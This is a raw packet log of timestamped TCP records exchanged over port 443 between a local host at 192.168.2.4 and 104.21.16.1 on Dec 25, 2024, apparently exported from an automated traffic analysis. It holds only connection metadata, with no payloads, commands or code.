                                                                                                                                  Dec 25, 2024 15:09:12.888998985 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.889041901 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.889050961 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.889077902 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.889096022 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.960743904 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.960766077 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.960808039 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.960823059 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.960834980 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.960892916 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.010159969 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.010184050 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.010221004 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.010231972 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.010255098 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.010283947 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.050316095 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.050337076 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.050396919 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.050406933 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.050440073 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.050471067 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.055912971 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.055932999 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.055974960 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.055983067 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.056010962 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.056029081 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.061249971 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.061280012 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.061311007 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.061317921 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.061342955 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.061359882 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.066167116 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.066186905 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.066231012 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.066239119 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.066255093 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.066287994 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.072205067 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.072226048 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.072263956 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.072272062 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.072299957 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.072312117 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.079827070 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.079878092 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.079899073 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.079905987 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.079929113 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.082664013 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.082726955 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.082736015 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.133637905 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.153616905 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.153661013 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.153693914 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.153702974 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.153731108 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.153749943 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.202532053 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.202570915 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.202601910 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.202615023 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.202641964 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.202661037 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.240727901 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.240765095 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.240792036 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.240801096 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.240829945 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.240856886 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.244129896 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.244195938 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.244204044 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.245206118 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.245270014 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.245276928 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.249289036 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.249320984 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.249345064 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.249351025 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.249378920 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.249392033 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.253690958 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.253725052 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.253752947 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.253760099 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.253787041 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.253804922 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.255399942 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.255465984 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.256732941 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.256793022 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.262226105 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.262248993 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.262290955 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.262298107 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.262339115 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.262356043 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.271485090 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.271505117 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.271548033 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.271555901 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.271589041 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.271604061 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.276626110 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.276648045 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.276688099 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.276694059 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.276726007 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.276756048 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.348460913 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.348484993 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.348522902 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.348530054 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.348577976 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.432696104 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.432718039 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.432774067 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.432791948 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.432804108 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.432830095 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.435096979 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.435164928 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.436148882 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.436203957 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.441510916 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.441529989 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.441586971 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.441598892 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.441642046 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.447182894 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.447205067 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.447246075 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.447253942 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.447279930 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.447293997 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.450298071 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.450335026 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.450370073 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.450378895 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.450412989 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.453008890 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.453074932 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.453083038 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.457250118 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.457284927 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.457308054 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.457314968 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.457345963 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.463781118 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.463836908 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.463845968 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.463888884 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.466466904 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.466527939 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.467905045 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.467961073 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.469240904 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.469300985 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.537501097 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.537564993 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.586874962 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.586922884 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.586940050 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.586949110 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.586977005 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.587985039 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.588041067 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.588049889 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.624049902 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.624095917 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.624105930 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.626796007 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.626835108 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.626857042 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.626863956 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.626899958 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.628403902 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.628459930 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.633249044 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.633270025 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.633311033 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.633318901 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.633344889 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.633361101 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.638865948 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.638886929 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.639050007 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.639058113 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.639101982 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.642163992 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.642215014 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.642224073 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.642251015 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.642255068 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.642273903 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.644412994 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.644471884 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.644480944 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.644524097 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.648468971 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.648529053 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.648530006 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.648552895 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.648581982 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.649679899 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.649772882 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.649780035 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.649826050 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.658643007 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.658684015 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.658705950 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.658713102 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.658750057 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.659965992 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.660020113 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.661555052 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.661616087 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.729662895 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.729758024 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.729762077 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.729778051 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.729821920 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.779340982 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.779390097 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.779432058 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.779454947 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.779489040 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.779510975 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.816350937 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.816435099 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.820089102 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.820125103 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.820166111 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.820192099 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.820219994 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.820241928 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.825208902 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.825248003 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.825284004 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.825299025 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.825330019 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.825350046 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.825946093 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.826049089 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.830130100 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.830164909 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.830202103 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.830214977 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.830245018 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.830266953 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.832601070 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.832664967 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.832672119 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.835670948 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.835709095 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.835741997 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.835748911 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.835789919 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.841212034 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.841249943 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.841280937 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.841286898 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.841337919 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.849950075 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.849982977 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.850013971 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.850019932 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.850060940 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.850075960 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.921890974 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.921924114 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.921972036 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.921988010 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.922018051 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.922038078 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.971940994 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.971970081 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.972028017 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.972043037 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:13.972073078 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:13.972091913 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:14.011483908 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:14.011506081 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:14.011550903 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:14.011565924 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:14.011615992 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:14.011615992 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:14.012128115 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:14.017127037 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:14.017148972 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:14.017210007 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:14.017231941 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:14.017256021 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:14.020317078 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:14.020348072 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:14.020394087 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:14.020411968 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:14.020626068 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:14.022775888 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:14.022859097 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:14.023530960 CET44349734104.21.16.1192.168.2.4
